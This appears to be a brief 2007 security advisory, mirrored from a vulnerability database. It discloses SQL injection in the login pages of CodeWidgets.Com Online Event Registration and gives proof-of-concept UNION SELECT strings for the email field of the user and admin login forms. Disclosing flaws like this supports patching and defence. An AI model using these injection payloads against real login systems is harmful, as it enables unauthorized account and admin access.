Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18275
HistoryOct 24, 2007 - 12:00 a.m.

[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection

2007-10-2400:00:00
vulners.com
21

http://Aria-Security.Net

CodeWidgets.Com Online Event Registration

Poc
Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net

Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net

Credits Goes To Aria-Security Team
Regards,
The-0utl4w